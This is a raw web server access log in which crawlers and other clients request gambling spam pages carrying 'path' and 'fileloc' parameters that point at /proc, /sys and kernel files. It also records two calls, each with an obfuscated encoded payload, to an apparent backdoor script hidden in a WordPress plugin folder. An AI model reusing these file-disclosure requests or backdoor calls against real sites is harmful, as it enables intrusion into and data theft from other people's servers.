20.171.207.217 - - [22/Oct/2025:00:34:35 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/device/block/vda/vda2/subsystem/vda/subsystem/vda/subsystem/vda1 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.3.155.146 - - [22/Oct/2025:00:34:36 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//sys/dev/block/7:0/queue/nr_zones&path=//sys/dev/block/7:0/queue HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.78 - - [22/Oct/2025:00:34:36 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/vda1/subsystem/loop4/bdi/power HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
107.21.115.37 - - [22/Oct/2025:00:34:36 +0000] "HEAD /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//proc/35/task/35/mounts&path=//proc/35/task/35 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/605.1.15 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/605.1.15"
216.73.216.183 - - [22/Oct/2025:00:34:37 +0000] "GET /739436198?entity=0736581490 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.183 - - [22/Oct/2025:00:34:38 +0000] "GET /739436198/?entity=0736581490 HTTP/1.1" 200 45438 "https://datainsightnow.com/739436198?entity=0736581490" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.217 - - [22/Oct/2025:00:34:39 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/device/block/vda/subsystem/vda/subsystem/loop1/subsystem/sr0/bdi HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:34:39 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/block/vda/device/block/vda/vda1/subsystem/loop6 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
98.82.63.147 - - [22/Oct/2025:00:34:40 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//usr/src/linux-headers-6.8.0-64/net/xdp/Makefile&path=//usr/src/linux-headers-6.8.0-64/net/xdp HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.135.21.75 - - [22/Oct/2025:00:34:42 +0000] "GET /wp-content/plugins/elementor-pro/core/database/database/index.php?ARRAY=7o2230223n313736313039363832322p2231223n22687474703n5p2s5p2s7n7335363476313373752r616p746s742r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313736313039333232322q6439323964613634303064663661313261346131306334643634323638616263222p2232223n226130333239623032353066623366656364343932343164363530613864656465222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232332q33382q35392q36372q37332q38322q3330227q HTTP/1.1" 504 176 "-" "-"
20.171.207.78 - - [22/Oct/2025:00:34:42 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/driver/virtio0/subsystem/drivers/virtio_blk/virtio1/block/vda/subsystem/sr0/mq HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.217 - - [22/Oct/2025:00:34:42 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/subsystem/vda/subsystem/vda2/subsystem/vda/subsystem/vda/device/block/vda/vda2 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.160.59.190 - - [22/Oct/2025:00:34:43 +0000] "HEAD /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//proc/220/attr/sockcreate&path=//proc/220/attr HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/605.1.15 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/605.1.15"
57.141.0.16 - - [22/Oct/2025:00:34:44 +0000] "GET /2025/03/06/page/39/?fileloc=//sys/class/pci_bus/0000:03/subsystem/0000:09/subsystem/0000:0c/subsystem/0000:10/cpuaffinity&path=//sys/class/pci_bus/0000:03/subsystem/0000:09/subsystem/0000:0c/subsystem/0000:10 HTTP/1.1" 200 262209 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
44.223.193.255 - - [22/Oct/2025:00:34:45 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?path=//usr/src/linux-headers-6.8.0-83-generic/drivers/media/radio HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.217 - - [22/Oct/2025:00:34:45 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/block/vda/subsystem/vda/subsystem/vda/subsystem/sr0/subsystem/vda1/subsystem HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:34:45 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/vda2/subsystem/loop6/mq HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.44.174.136 - - [22/Oct/2025:00:34:48 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//sys/module/xt_tcpudp/sections/.text&path=//sys/module/xt_tcpudp/sections HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.217 - - [22/Oct/2025:00:34:48 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/vda1/subsystem/vda/subsystem/vda/subsystem/vda/device/block/vda/subsystem/vda1 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:34:48 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/vda2/subsystem/loop4/bdi/power HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.135.21.75 - - [22/Oct/2025:00:34:52 +0000] "POST /wp-cron.php?doing_wp_cron=1761093291.2866079807281494140625 HTTP/1.1" 499 0 "-" "WordPress/6.3.1; https://datainsightnow.com"
20.171.207.217 - - [22/Oct/2025:00:34:52 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/subsystem/vda/subsystem/vda/subsystem/vda/vda2/subsystem/loop7 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:34:53 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/subsystem/vda/vda2/subsystem/loop5/bdi/power HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.221.105.234 - - [22/Oct/2025:00:34:53 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?path=//lib/firmware/ath11k/WCN6750/hw1.0/qcm6490 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
54.157.151.55 - - [22/Oct/2025:00:34:53 +0000] "HEAD /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//proc/41/net/tls_stat&path=//proc/41/net HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/605.1.15 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/605.1.15"
216.73.216.183 - - [22/Oct/2025:00:34:54 +0000] "GET /1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty29%2Fsubsystem%2FttyS21%2Fsubsystem%2Ftty53%2Fsubsystem%2FttyS22 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.183 - - [22/Oct/2025:00:34:54 +0000] "GET /1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit/?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty29%2Fsubsystem%2FttyS21%2Fsubsystem%2Ftty53%2Fsubsystem%2FttyS22 HTTP/1.1" 200 45438 "https://datainsightnow.com/1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty29%2Fsubsystem%2FttyS21%2Fsubsystem%2Ftty53%2Fsubsystem%2FttyS22" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.217 - - [22/Oct/2025:00:34:55 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/device/block/vda/subsystem/loop4/subsystem/vda/subsystem/loop4 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:34:55 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/vda2/subsystem/loop6/power HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
100.29.107.38 - - [22/Oct/2025:00:34:56 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//usr/src/linux-headers-6.8.0-83/include/linux/cred.h&path=//usr/src/linux-headers-6.8.0-83/include/linux HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.217 - - [22/Oct/2025:00:34:58 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/subsystem/vda/vda2/subsystem/vda/device/block/vda/device/subsystem/devices/virtio4 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.183 - - [22/Oct/2025:00:34:58 +0000] "GET /1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty29%2Fsubsystem%2Ftty57%2Fsubsystem%2Ftty14%2Fsubsystem%2Ftty12%2Fsubsystem%2Ftty7 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.78 - - [22/Oct/2025:00:34:58 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/vda2/subsystem/loop4/holders HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.183 - - [22/Oct/2025:00:34:59 +0000] "GET /1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit/?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty29%2Fsubsystem%2Ftty57%2Fsubsystem%2Ftty14%2Fsubsystem%2Ftty12%2Fsubsystem%2Ftty7 HTTP/1.1" 200 45438 "https://datainsightnow.com/1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty29%2Fsubsystem%2Ftty57%2Fsubsystem%2Ftty14%2Fsubsystem%2Ftty12%2Fsubsystem%2Ftty7" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.227.124.101 - - [22/Oct/2025:00:34:59 +0000] "HEAD /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//sys/kernel/slab/kmalloc-4k/min_partial&path=//sys/kernel/slab/kmalloc-4k HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/605.1.15 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/605.1.15"
52.71.216.196 - - [22/Oct/2025:00:35:00 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//proc/60/task/60/net/ip_tables_targets&path=//proc/60/task/60/net HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.183 - - [22/Oct/2025:00:35:01 +0000] "GET /1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty53%2Fsubsystem%2Ftty29%2Fsubsystem%2FttyS19%2Fsubsystem%2Ftty12%2Fsubsystem%2FttyS18 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.217 - - [22/Oct/2025:00:35:01 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/driver/virtio1/block/vda/device/block/vda/device/block/vda/device/driver/virtio1 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:35:02 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/subsystem/loop3/subsystem/sr0/queue/bsg/power HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.135.21.75 - - [22/Oct/2025:00:35:02 +0000] "GET /wp-content/plugins/elementor-pro/core/database/database/index.php?ARRAY=7o2230223n313736313039363834322p2231223n22687474703n5p2s5p2s7n7335363476313373752r616p746s742r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313736313039333234322q6634666630346332386138353761303436623333343031363539626635326236222p2232223n226130333239623032353066623366656364343932343164363530613864656465222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232332q33382q35392q36372q37332q38322q3330227q HTTP/1.1" 504 176 "-" "-"
216.73.216.183 - - [22/Oct/2025:00:35:02 +0000] "GET /1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit/?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty53%2Fsubsystem%2Ftty29%2Fsubsystem%2FttyS19%2Fsubsystem%2Ftty12%2Fsubsystem%2FttyS18 HTTP/1.1" 200 45438 "https://datainsightnow.com/1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty53%2Fsubsystem%2Ftty29%2Fsubsystem%2FttyS19%2Fsubsystem%2Ftty12%2Fsubsystem%2FttyS18" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.183 - - [22/Oct/2025:00:35:03 +0000] "GET /1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty29%2Fsubsystem%2FttyS21%2Fsubsystem%2Ftty53%2Fsubsystem%2Ftty25%2Fpower HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.217 - - [22/Oct/2025:00:35:04 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/vda1/subsystem/vda/subsystem/vda/device/subsystem/devices/virtio2 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.183 - - [22/Oct/2025:00:35:05 +0000] "GET /1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit/?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty29%2Fsubsystem%2FttyS21%2Fsubsystem%2Ftty53%2Fsubsystem%2Ftty25%2Fpower HTTP/1.1" 200 45438 "https://datainsightnow.com/1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty29%2Fsubsystem%2FttyS21%2Fsubsystem%2Ftty53%2Fsubsystem%2Ftty25%2Fpower" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.78 - - [22/Oct/2025:00:35:05 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/driver/virtio0/subsystem/drivers/virtio_blk/virtio1/block/vda/subsystem/vda/vda2 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.215.24.66 - - [22/Oct/2025:00:35:05 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//usr/share/doc/sed/THANKS.gz&path=//usr/share/doc/sed HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.183 - - [22/Oct/2025:00:35:06 +0000] "GET /1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty53%2Fsubsystem%2Ftty29%2Fsubsystem%2FttyS16%2Fsubsystem%2Ftty31%2Fsubsystem%2Ftty62 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.183 - - [22/Oct/2025:00:35:07 +0000] "GET /1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit/?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty53%2Fsubsystem%2Ftty29%2Fsubsystem%2FttyS16%2Fsubsystem%2Ftty31%2Fsubsystem%2Ftty62 HTTP/1.1" 200 45438 "https://datainsightnow.com/1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty53%2Fsubsystem%2Ftty29%2Fsubsystem%2FttyS16%2Fsubsystem%2Ftty31%2Fsubsystem%2Ftty62" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.78 - - [22/Oct/2025:00:35:07 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/subsystem/loop2/subsystem/sr0/queue/bsg/power HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.217 - - [22/Oct/2025:00:35:08 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/subsystem/vda/device/block/vda/subsystem/loop1/subsystem/vda2 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.194.14.255 - - [22/Oct/2025:00:35:08 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//sys/block/loop2/trace/enable&path=//sys/block/loop2/trace HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
44.194.228.53 - - [22/Oct/2025:00:35:09 +0000] "HEAD /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//sys/kernel/slab/:A-0000080/slabs&path=//sys/kernel/slab/:A-0000080 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/605.1.15 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/605.1.15"
216.73.216.183 - - [22/Oct/2025:00:35:09 +0000] "GET /1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty29%2Fsubsystem%2Ftty8%2Fsubsystem%2Ftty53%2Fsubsystem%2Ftty27%2Fpower HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
114.119.140.178 - - [22/Oct/2025:00:35:10 +0000] "GET /zodiac-kasino-erfahrungen-2024-480-bonus-80-freispiele/?path=//sys/dev/char/89:0/device/firmware_node/subsystem/devices/device:1e HTTP/1.1" 200 45439 "https://datainsightnow.com/zodiac-kasino-erfahrungen-2024-480-bonus-80-freispiele/?path=//sys/dev/char/89%3A0/device/firmware_node/subsystem/devices" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.73.216.183 - - [22/Oct/2025:00:35:11 +0000] "GET /1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit/?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty29%2Fsubsystem%2Ftty8%2Fsubsystem%2Ftty53%2Fsubsystem%2Ftty27%2Fpower HTTP/1.1" 200 45438 "https://datainsightnow.com/1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty29%2Fsubsystem%2Ftty8%2Fsubsystem%2Ftty53%2Fsubsystem%2Ftty27%2Fpower" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.217 - - [22/Oct/2025:00:35:11 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/subsystem/loop6/subsystem/vda/subsystem/vda/subsystem/vda/vda1 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:35:11 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/vda2/subsystem/loop4/power HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
